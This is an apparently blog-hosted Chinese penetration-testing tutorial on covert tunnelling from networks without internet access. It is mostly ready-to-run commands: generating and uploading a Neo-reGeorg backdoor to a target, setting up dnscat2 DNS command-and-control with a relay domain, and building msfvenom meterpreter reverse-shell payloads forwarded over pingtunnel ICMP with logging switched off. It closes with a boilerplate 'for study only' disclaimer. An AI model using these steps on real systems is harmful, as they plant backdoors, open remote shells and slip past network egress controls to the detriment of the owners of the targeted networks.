应用场景
在不出网的严苛环境下进行渗透时,使用HTTP/DNS/ICMP进行代理隧道连接
HTTP代理(Neo-regGeorg)
1、下载Neo-regGeorg
git clone https://github.com/L-codes/Neo-reGeorg.git
2.攻击机运行neoreg.py
python3 neoreg.py generate -k 123456
3.将生成的后门上传至靶机
4、攻击连接靶机
python3 neoreg.py -k 123456 -u http://192.168.10.132/public/tunnel.php
5.攻击机开启代理即可访问目标机器可访问的机器
DNS隧道(Dnscat2)
一、直接模式
1、安装
(1)服务端安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
#解决bundle install特别慢的问题
修改Gemfile文件中的source如下:
source 'https://gems.ruby-china.com'
(2)客户端编译(在攻击机中编译,将编译好的文件上传至靶机)
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
2、启动服务端
ruby ./dnscat2.rb
#53端口占用的解决方法 https://www.itren.org/319.html
3、启动客户端
./dnscat --dns server=192.168.10.131,port=53 --secret=5154a93f3e3adb86f7f4ba015c66337b
二、域名中继模式
1、安装
(1)服务端安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
#解决bundle install特别慢的问题
修改Gemfile文件中的source如下:
source 'https://gems.ruby-china.com'
(2)客户端编译(在攻击机中编译,将编译好的文件上传至靶机)
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
2、启动服务端
ruby ./dnscat2.rb ns1.comeonsite.top --secret=shan
3、启动客户端
./dnscat --secret=shan ns1.comeonsite.top
ICMP隧道
1、icmp隧道转发tcp上线msf
(1)将pingtunnel上传至攻击机,并开启服务
./pingtunnel -type server
(2)生成msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 -f exe -o /root/Desktop/6666.exe
(3)将msfvenom上传至靶机
(4)将pingtunnel上传至靶机,并开启转发
./pingtunnel -type client -l 127.0.0.1:6666 -s 192.168.10.131 -t 192.168.10.131:6666 -tcp 1 -noprint 1 -nolog 1
(5)msf开启监听
(6)执行上传的木马,即可获得meterpreter
2、icmp隧道转发socks5上线msf
(1)将pingtunnel上传至攻击机,并开启服务
./pingtunnel -type server
(2)生成msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.131 lport=6666 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6666 -f exe > 8899.exe
(3)将msfvenom上传至靶机
(4)将pingtunnel上传至靶机,并开启转发
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.10.131 -sock5 1 -noprint 1 -nolog 1
(5)msf开启监听
(6)执行上传的木马,即可获得meterpreter
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)